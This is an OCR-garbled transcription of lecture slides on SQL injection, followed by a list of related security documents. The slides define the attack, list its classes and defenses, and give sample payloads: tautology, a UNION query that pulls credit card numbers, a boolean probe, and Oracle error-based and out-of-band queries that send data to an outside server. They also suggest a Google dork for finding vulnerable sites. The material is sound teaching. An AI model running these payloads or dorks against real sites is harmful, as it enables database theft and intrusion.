SQL Injec*on. By Robin Gonzalez
|
|
- Eugene Cobb
- 5 years ago
- Views:
Transcription
1 SQL Injec*on By Robin Gonzalez
2
3 Some things that can go wrong Excessive and Unused Privileges Privilege Abuse Input Injec>on Malware Week Audit Trail
4 Other things that can go wrong Storage Media Exposure Exploita>on of Vulnerable Databases Unmanaged Sensi>ve Data Denial of Service Limited Security Exper>se
5 SQL Injec*on in a nutshell Type 1 Type 2
6 Defini*on An SQL injec>on akack consists of inser>on or "injec>on" of either a par>al or complete SQL query via the data input or transmiked from the client (browser) to the web applica>on. A SQL injec>on can: read sensi>ve data, modify database data, execute administra>on opera>ons on the DB, write into the file system and in some cases issue commands to the OS.
7 Basic examples Example of a dynamic SQL query. SELECT >tle, text FROM news WHERE id=$id User supplies 10 or 1=1 SELECT >tle, text FROM news WHERE id=10 or 1=1
8 Classes of SQLIA In- band data is extracted using the same channel that is used to inject the SQL code. Out- of- band data is retrieved using a different channel (e.g., an ). Inferen>al or Blind - the tester observes the resul=ng behavior of the DB from par=cular queries.
9 Techniques to exploit SQL Union operator - The UNION operator is used in SQL injec=ons to join two queries. Boolean use boolean logic to verify that certain condi=ons are true or false. Error based forces the DB to generate an error, giving the adversary informa=on upon which to refine their injec=on. Out- of- band technique used to retrieve data with another channel.
10 Interac*on with databases An adversary first needs to understand when the applica>on interacts with a DB server to access data. Typical examples are: Authen>ca>on forms most likely checked against a DB with usernames and passwords. Search engines string inpuler by user used in SQL query to extract all relevant records in the DB. E- commerce sites the products and their characteris=cs are likely stored in a DB.
11 Tes*ng for SQL injec*on We can use a single quote (') or a semicolon (;) to the field or parameter under test. The first is used in SQL as a string terminator and, if not filtered by the applica=on, would lead to an incorrect query. A very simple but effec>ve technique is to insert a string where a number is expected.
12 Boolean- based exploita*on hkp://widgetshop.com/widget/?id=1 and 1=2 What could happen? (1) excep>on, and (2) no record, developers assume. hkp://widgetshop.com/widget/?id=1?id=1 and ( select top 1 substring(name, 1, 1) from sysobjects where id=( select top 1 id from ( select top 1 id from sysobjects where xtype='u' order by id ) sq order by id desc ) ) = 'a'
13 Union Exploita*on SELECT Name, Phone, Address FROM Users WHERE Id=$id We will set the $id value with the following query: $id=1 UNION SELECT creditcardnumber,1,1 FROM CreditCardTable Which will join the result of the original query with all the credit card numbers in the CreditCardTable table.
14 Error Based Exploita*on SELECT * FROM products WHERE id_product=$id_product hkp:// UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )- - ORA : host SCOTT unknown Then the tester can manipulate the parameter passed to GET_HOST_NAME() func=on and the result will be shown in the error message.
15 Out of band Exploita*on SELECT * FROM products WHERE id_product=$id_product hkp:// UTL_HTTP.request( testerserver.com:80 (SELECT user FROM DUAL)- - This Oracle func>on will try to connect to testerserver and make a HTTP GET request containing the return from the query SELECT user FROM DUAL. The tester can set up a webserver (e.g. Apache) or use the Netcat tool:
16 Google dorks We can easily find list of Google dorks that an adversary can use to find a vulnerable site. Let s try to find a site vulnerable to SQL injec>on. Search for inurl:index.php?id= and then akach a at the end of the URL. If the page results in an error then it is vulnerable to SQL injec>on.
17 Demo of a SQLIA hkps:// LFK1c
18 Defending Against SQLIA Do not blindly trust inputs. Create error messages with care. Keep databases and applica>ons fully patched. Implement network monitoring tools. Implement filtering tools.
19 Defending Against SQLIA Prepared Statements (Parameterized Queries). Stored procedures. Escaping all user supplied input. Proper privileges. White list input valida>on.
20 DoS It is easy for a malicious user or bot to create havoc by execu>ng long running and CPU intensive queries against your database. If crated correctly an effec>ve SQL DOS akack could cause your system to become unavailable for a period of >me.
21 DoS The longer the string being matched the longer the query execu>on >me. Combining pakerns in an OR statement will increase the execu>on >me. Adding % around the search string will increase the effec>veness especially at the beginning of the string as it will prevent any available index from being used.
22 Kerberos and Cybersafe Kerberos is a free trusted third- party authen>ca>on system that was created by the MIT. Kerberos presumes that the third party is secure and provides single sign- on capabili>es, centralized password storage, and database link authen>ca>on. With only one centralized password store, it reduces the administra>ve overhead and requires users to remember only one password. It also enables user database links.
CISC So*ware Quality Assurance
CISC 327 - So*ware Quality Assurance Lecture 29b Web Applica>on Security CISC327-2003 2017 J.R. Cordy, S. Grant, J.S. Bradbury, J. Dunfield Outline Web Applica>on Security SQL Injec>on Parameter Manipula>on
More informationTop 10 Web Application Vulnerabilities
Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other
More informationObjec&ves. Review: Security. Google s AI is wri&ng poetry SQL INJECTION ATTACK. SQL Injec&on. SQL Injec&on. Security:
Objec&ves Security: Ø Injec&on a6acks Ø Cross-site scrip&ng Ø Insecure direct object reference Group photo Review: Security Why has the Web become such a huge target? How can you protect against security
More informationPattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.
Pattern Recognition and Applications Lab WEB Security Giorgio Giacinto giacinto@diee.unica.it Sicurezza Informa1ca, 2015-2016 Department of Electrical and Electronic Engineering University of Cagliari,
More informationCare & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December
Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers Sunny Wear OWASP Tampa Chapter December Mee@ng 1 About the Speaker Informa@on Security Architect Areas of exper@se: Applica@on,
More informationWeb Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012
Web Pen Tes)ng Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012 Exploi)ng Vulnerabili)es Code injec)on Cross site scrip)ng, SQL injec)on, (buffer
More informationModel- Based Security Tes3ng with Test Pa9erns
Model- Based Security Tes3ng with Test Pa9erns Julien BOTELLA (Smartes5ng) Jürgen GROSSMANN (FOKUS) Bruno LEGEARD (Smartes3ng) Fabien PEUREUX (Smartes5ng) Mar5n SCHNEIDER (FOKUS) Fredrik SEEHUSEN (SINTEF)
More informationVirtualization. Introduction. Why we interested? 11/28/15. Virtualiza5on provide an abstract environment to run applica5ons.
Virtualization Yifu Rong Introduction Virtualiza5on provide an abstract environment to run applica5ons. Virtualiza5on technologies have a long trail in the history of computer science. Why we interested?
More informationLecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion
IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection
More informationWeb Applica+on Security
Web Applica+on Security Raluca Ada Popa Feb 25, 2013 6.857: Computer and Network Security See last slide for credits Outline Web basics: HTTP Web security: Authen+ca+on: passwords, cookies Security amacks
More informationTop 10 Database Security Threats and How to Stop Them. Rob Rachwald Director of Security Strategy
Top 10 Database Security Threats and How to Stop Them Rob Rachwald Director of Security Strategy Data Has Value Data Has Value Top 7 Attacks Discussed in Hacker Forums 11% 9% 12% 12% 15% 21% 20% dos/ddos
More informationMWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010
MWR InfoSecurity Security Advisory Oracle Enterprise Manager SQL Injection Advisory 1 st February 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationHow to read security test report?
How to read security test report? Ainārs Galvāns Security Tester Exigen Services Latvia www.exigenservices.lv Defini@ons (wikipedia) Term Threat Vulnerability Informa@on assurance Defini+on A threat is
More informationTutorial on SQL Injection
Tutorial on SQL Injection Author: Nagasahas Dasa Information Security Enthusiast You can reach me on solidmonster.com or nagasahas@gmail.com Big time!!! Been long time since I posted my blog, this would
More informationSQL Injection. EECS Introduction to Database Management Systems
SQL Injection EECS3421 - Introduction to Database Management Systems Credit "Foundations of Security: What Every Programmer Needs To Know" (Chapter 8) by Neil Daswani, Christoph Kern, and Anita Kesavan
More informationAssignment 6. This lab should be performed under the Oracle Linux VM provided in the course.
Assignment 6 This assignment includes hands-on exercises in the Oracle VM. It has two Parts. Part 1 is SQL Injection Lab and Part 2 is Encryption Lab. Deliverables You will be submitting evidence that
More informationSQL Injection SPRING 2018: GANG WANG
SQL Injection SPRING 2018: GANG WANG SQL Injection Another reason to validate user input data Slides credit to Neil Daswani and Adam Doupé 2 3 http://xkcd.com/327/ Produce More Secure Code Operating system
More informationWeb applica*on security for dynamic
Web applica*on security for dynamic languages zane@etsy.com @zanelackey Who am I? Security Engineering Manager @ Etsy Lead AppSec/NetSec/SecEng teams Formerly @ isec Partners Books/presenta*ons primarily
More informationEffec%ve Use of Oracle s 12c Database Opera%on Monitor
Managed Services Cloud Services Consul3ng Services Licensing Effec%ve Use of Oracle s 12c Database Opera%on Monitor UTOUG Training Days 2016 Kasey Parker Enterprise Architect Kasey.Parker@centroid.com
More informationEasy and quick vulnerability hun5ng in Windows. Cesar Cerrudo CTO at IOAc5ve Labs
Easy and quick vulnerability hun5ng in Windows Cesar Cerrudo CTO at IOAc5ve Labs 1 Who am I? CTO at IOAc5ve Labs Leading efforts to produce cufng edge research I have been working on security for +9 years
More informationWho s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl
Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl 1 http://xkcd.com/327/ 2 What Is SQL Injection? Incorrectly validated or nonvalidated string literals are concatenated into
More informationAdvanced SQL Injection Techniques. Roy Fox Red Team Manager, Sentrigo
Advanced SQL Injection Techniques Roy Fox Red Team Manager, Sentrigo About me Head of Security Research (Red Team) at Sentrigo Background: technical information security for gov t At Sentrigo we write
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More information1. Oracle mod_plsql v in Oracle9i Application Server v1.0.2.x (Oracle9iAS v1.0.2.x)
Oracle Security Alert #28 Dated: 06 Feburary 2002 Updated: 05 July 2002 1. Oracle mod_plsql v3.0.9.8.2 in Oracle9i Application Server (Oracle9iAS ) a) Potential buffer overflow-related security vulnerabilities
More informationTechnology White Paper of SQL Injection Attacks and Prevention
Technology White Paper of SQL Injection Attacks and Prevention Keywords: SQL injection, SQL statement, feature identification Abstract: SQL injection attacks are common attacks that exploit database vulnerabilities.
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationWebapps Vulnerability Report
Webapps Vulnerability Report Tuesday, January 12, 2010 Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE IMPACT during this
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationDoDOM: Leveraging DOM Invariants for Web 2.0 Applica<on Robustness Tes<ng
DoDOM: Leveraging DOM Invariants for Web 2.0 Applica
More informationSecure Programming Lecture 8++: SQL Injection
Secure Programming Lecture 8++: SQL Injection David Aspinall, Informatics @ Edinburgh 9th February 2016 Outline Overview Other past attacks More examples Classification Injection route and motive Forms
More informationW e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s
W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications
More informationBank Infrastructure - Video - 1
Bank Infrastructure - 1 05/09/2017 Threats Threat Source Risk Status Date Created Account Footprinting Web Browser Targeted Malware Web Browser Man in the browser Web Browser Identity Spoofing - Impersonation
More informationLeveraging User Session Data to Support Web Applica8on Tes8ng
Leveraging User Session Data to Support Web Applica8on Tes8ng Authors: Sebas8an Elbaum, Gregg Rotheermal, Srikanth Karre, and Marc Fisher II Presented By: Rajiv Jain Outline Introduc8on Related Work Tes8ng
More information16th Annual Karnataka Conference
16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu OWASP Top 10 An Overview The Open Web Application Security
More informationIT Service Delivery and Support Week Three. IT Auditing and Cyber Security Fall 2016 Instructor: Liang Yao
IT Service Delivery and Support Week Three IT Auditing and Cyber Security Fall 2016 Instructor: Liang Yao 1 Infrastructure Essentials Computer Hardware Operating Systems (OS) & System Software Applications
More informationData Base Management System LAB LECTURES
Data Base Management System LAB LECTURES Taif University faculty of Computers and Information Technology First Semester 34-1435 H A. Arwa Bokhari & A. Khlood Alharthi & A. Aamal Alghamdi OBJECTIVE u Stored
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationWeb Application Attacks
Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~
More informationAutomated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation
Automated SQL Ownage Techniques October 30 th, 2009 Sebastian Cufre Developer Core Security Technologies sebastian.cufre@coresecurity.com Copyright The Foundation Permission is granted to copy, distribute
More informationAtrina: Inferring Unit Oracles from GUI Test Cases
Atrina: Inferring Unit Oracles from GUI Test Cases Shabnam Mirshokraie Ali Mesbah Karthik Pa4abiraman University of Bri:sh Columbia @Test public void testshopcontainer() { WebElement item = driver.findelements(by.css(".merchandise"));
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More information11/12/11. Objec&ves Overview. Databases, Data, and Informa&on. Objec&ves Overview. Databases, Data, and Informa&on. Databases, Data, and Informa&on
Objec&ves Overview Define the term,, and explain how a interacts with and informa:on Define the term, integrity, and describe the quali:es of valuable informa:on Discuss the terms character, field, record,
More informationA (sample) computerized system for publishing the daily currency exchange rates
A (sample) computerized system for publishing the daily currency exchange rates The Treasury Department has constructed a computerized system that publishes the daily exchange rates of the local currency
More informationModule 14: SQL Injection
Module 14: SQL Injection Objective The objective of this lab is to provide expert knowledge on SQL Injection attacks and other responsibilities that include: Understanding when and how web application
More informationThe SOAPbox User s Guide
The SOAPbox User s Guide Application Documentation Version 1.3 THE SOCIAL FOUNDRY November 9, 2012 The SOAPbox User s Guide Application Documentation Version 1.3 Congratulations on your purchase of the
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationDrone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created
Drone - 2 04/12/2018 Threat Model Description Threats Threat Source Risk Status Date Created Mobile Phone: Sensitive Data Leakage Smart Devices Mobile Phone: Session Hijacking Smart Devices Mobile Phone:
More informationWebGoat Lab session overview
WebGoat Lab session overview Initial Setup Virtual Machine Tamper Data Web Goat Basics HTTP Basics Sniffing Web server attacks SQL Injection XSS INITIAL SETUP Tamper Data Hold alt to reveal the menu in
More informationGoing Without CPU Patches on Oracle E-Business Suite 11i?
Going Without CPU Patches on E-Business Suite 11i? September 17, 2013 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation About
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationSQL Injection Attacks and Defense
SQL Injection Attacks and Defense Justin Clarke Lead Author and Technical Editor Rodrigo Marcos Alvarez Dave Hartley Joseph Hemler Alexander Kornbrust Haroon Meer Gary O'Leary-Steele Alberto Revelli Marco
More informationCS 5614: (Big) Data Management Systems. B. Aditya Prakash Lecture #6: Transac/ons 1: Intro. to ACID
CS 5614: (Big) Data Management Systems B. Aditya Prakash Lecture #6: Transac/ons 1: Intro. to ACID Project dates Proposal due: Feb 23 Milestone due: Mar 28 Final report/posters etc: May 2 (last class)
More informationUnderstanding Advanced Blind SQLI attack
Understanding Advanced Blind SQLI attack Amit Dabas, Ashish Kumar Sharma Cyber Forensics & Information Security, MDU,amitdab@gmail.com,+918588831807 Abstract SQL Injection is not new attack to our web
More informationInjection attacks use specially crafted inputs to subvert the intended operation of applications.
Secure Programming Lecture 8: SQL Injection David Aspinall, Informatics @ Edinburgh 8th February 2018 Recap Injection attacks use specially crafted inputs to subvert the intended operation of applications.
More informationUNIT V: CENTRAL PROCESSING UNIT
UNIT V: CENTRAL PROCESSING UNIT Agenda Basic Instruc1on Cycle & Sets Addressing Instruc1on Format Processor Organiza1on Register Organiza1on Pipeline Processors Instruc1on Pipelining Co-Processors RISC
More informationApplication and Data Security with F5 BIG-IP ASM and Oracle Database Firewall
F5 White Paper Application and Data Security with F5 BIG-IP ASM and Oracle Database Firewall Organizations need an end-to-end web application and database security solution to protect data, customers,
More informationComputer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks
Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition Chapter 3 Investigating Web Attacks Objectives After completing this chapter, you should be able to: Recognize the indications
More informationKarthik Bharathy Program Manager, SQL Server Microsoft
Karthik Bharathy Program Manager, SQL Server Microsoft Key Session takeaways Understand the many views of SQL Server Look at hardening SQL Server At the network level At the access level At the data level
More informationCSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Threat model In these scenarios: The server is benign The client is malicious The client
More informationSta$c Analysis Dataflow Analysis
Sta$c Analysis Dataflow Analysis Roadmap Overview. Four Analysis Examples. Analysis Framework Soot. Theore>cal Abstrac>on of Dataflow Analysis. Inter- procedure Analysis. Taint Analysis. Overview Sta>c
More informationObjec0ves. Gain understanding of what IDA Pro is and what it can do. Expose students to the tool GUI
Intro to IDA Pro 31/15 Objec0ves Gain understanding of what IDA Pro is and what it can do Expose students to the tool GUI Discuss some of the important func
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationEAS- SEC: Framework for Securing Enterprise Business Applica;ons
Invest in security to secure investments EAS- SEC: Framework for Securing Enterprise Business Applica;ons Alexander Polyakov CTO ERPScan About ERPScan The only 360- degree SAP Security solu8on - ERPScan
More informationPerslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.
Eleonora Petridou Pascal Cuylaerts System And Network Engineering University of Amsterdam June 30, 2011 Outline Research question About Perslink Approach Manual inspection Automated tests Vulnerabilities
More informationCSE 127 Computer Security
CSE 127 Computer Security Fall 2015 Web Security I: SQL injection Stefan Savage The Web creates new problems Web sites are programs Partially implemented in browser» Javascript, Java, Flash Partially implemented
More informationExam Questions v8
Exam Questions 412-79v8 EC-Council Certified Security Analyst https://www.2passeasy.com/dumps/412-79v8/ 1.Which of the following password cracking techniques is used when the attacker has some information
More informationCS 4604: Introduc0on to Database Management Systems. B. Aditya Prakash Lecture #17: Transac0ons 1: Intro. to ACID
CS 4604: Introduc0on to Database Management Systems B. Aditya Prakash Lecture #17: Transac0ons 1: Intro. to ACID Why Transac0ons? Database systems are normally being accessed by many users or processes
More informationConfiguring User Defined Patterns
The allows you to create customized data patterns which can be detected and handled according to the configured security settings. The uses regular expressions (regex) to define data type patterns. Custom
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation
ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP
More informationA1 (Part 2): Injection SQL Injection
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Firewall Firewall Accounts
More informationATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC
ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC AGENDA VULNERABILITIES OF WEB EXPLOIT METHODS COUNTERMEASURE About Me DIRECTOR OF FORESEC COUNTER TERRORIST ACTION TEAM RESEARCH
More informationCyberP3i Hands-on Lab Series
CyberP3i Hands-on Lab Series Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor Hands-On Lab for Application Attacks The NDG Security+ Pod Topology Is Used 1. Introduction In this lab,
More informationAvoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:
Avoiding Web Application Flaws In Embedded Devices Jake Edge LWN.net jake@lwn.net URL for slides: http://lwn.net/talks/elce2008 Overview Examples embedded devices gone bad Brief introduction to HTTP Authentication
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationThe Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else
The Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else Paula Januszkiewicz CQURE: CEO, Penetration Tester CQURE Offices: New York, Dubai, Warsaw MVP: Enterprise Security,
More informationW1005 Intro to CS and Programming in MATLAB. Brief History of Compu?ng. Fall 2014 Instructor: Ilia Vovsha. hip://www.cs.columbia.
W1005 Intro to CS and Programming in MATLAB Brief History of Compu?ng Fall 2014 Instructor: Ilia Vovsha hip://www.cs.columbia.edu/~vovsha/w1005 Computer Philosophy Computer is a (electronic digital) device
More informationPenetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant
Penetration Testing following OWASP Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant За Лирекс Penetration testing A method of compromising the security of a computer system or network by
More informationCS 161 Computer Security
Nick Weaver Fall 2018 CS 161 Computer Security Homework 3 Due: Friday, 19 October 2018, at 11:59pm Instructions. This homework is due Friday, 19 October 2018, at 11:59pm. No late homeworks will be accepted
More informationTautology based Advanced SQL Injection Technique A Peril to Web Application
IJIRST National Conference on Latest Trends in Networking and Cyber Security March 2017 Tautology based Advanced SQL Injection Technique A Peril to Web Application Kritarth Jhala 1 Shukla Umang D 2 2 Department
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Web Application Security Dr. Basem Suleiman Service Oriented Computing Group, CSE, UNSW Australia Semester 1, 2016, Week 8 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2442
More informationSecure Programming. CS3524 Distributed Systems Lecture 16
Secure Programming CS3524 Distributed Systems Lecture 16 Secure Programming Wri=ng code that is difficult to aaack Free of dangerous bugs (from security perspec=ve) General principles Language-specific
More informationWhy Transac'ons? Database systems are normally being accessed by many users or processes at the same 'me.
Transac'ons 1 Why Transac'ons? Database systems are normally being accessed by many users or processes at the same 'me. Both queries and modifica'ons. Unlike opera'ng systems, which support interac'on
More informationCloud Adop)on, Risks & Security & GDPR An Ac)on Guide
April 2016 Cloud Adop)on, Risks & Security & GDPR An Ac)on Guide Nigel Hawthorn, Skyhigh Networks Cloud Adop)on and Risk Agenda Skyhigh Networks An Introduc)on European Cloud Adop)on and Risk Report Q1
More informationSQL Injection Attack Lab
SEED Labs SQL Injection Attack Lab 1 SQL Injection Attack Lab Copyright 2006-2016 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2016 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2445 1 Assignment
More informationSQL Injection: From Basics To Botnet-Based Attack Automation
SQL Injection: From Basics To Botnet-Based Attack Automation http://y Neil Daswani June 2008 Is the sky falling? ( 2007 TJX (March owns TJ Maxx, Marshalls, and other dept stores attacks exploited WEP used
More informationChapter 5: Database Security
i Chapter 5: Comp Sci 3600 Outline i 1 2 i 3 4 5 Outline i 1 2 i 3 4 5 What is a i Structured collection of data stored for use by one or more applications Contains the relationships between data items
More informationA D V I S O R Y S E R V I C E S. Web Application Assessment
A D V I S O R Y S E R V I C E S Web Application Assessment March 2009 Agenda Definitions Landscape of current web applications Required skills Attack surface Scope Methodology Soft skills 2 Definitions
More informationDefense in Depth for Systems Administrators
Defense in Depth for Systems Administrators #whoami Jayme Hancock Currently: Penetra?on Tester with AppSec Consul?ng Previously: Systems Administrator for Small & Med Business Systems Administrator for
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationMPI Performance Analysis Trace Analyzer and Collector
MPI Performance Analysis Trace Analyzer and Collector Berk ONAT İTÜ Bilişim Enstitüsü 19 Haziran 2012 Outline MPI Performance Analyzing Defini6ons: Profiling Defini6ons: Tracing Intel Trace Analyzer Lab:
More informationhbps://github.com/k2 (Un) Fucking Forensics Ac#ve/Passive memory hacking/debugging K2 /
hbps://github.com/k2 (Un) Fucking Forensics Ac#ve/Passive memory hacking/debugging K2 / Director @IOACTIVE About me? Hacker for a while invtero.net Memory analysis framework for Windows Super fast/gbps
More informationData Security and Privacy : Compliance to Stewardship. Jignesh Patel Solution Consultant,Oracle
Data Security and Privacy : Compliance to Stewardship Jignesh Patel Solution Consultant,Oracle Agenda Connected Government Security Threats and Risks Defense In Depth Approach Summary Connected Government
More informationSecurity DY JEOPARDY JEOPARDY JEOPARDY JEOPARDY JEOPARDY
JEOPARDY JEOPARDY JEOPARDY JEOPARDY JEOPARDY JEO Security DY JEOPARDY JEOPARDY JEOPARDY JEOPARDY JEOPARDY HERE ARE TODAY S CATEGORIES Life, Death, Taxes and Breaches Data Classification What is Your RISK?
More information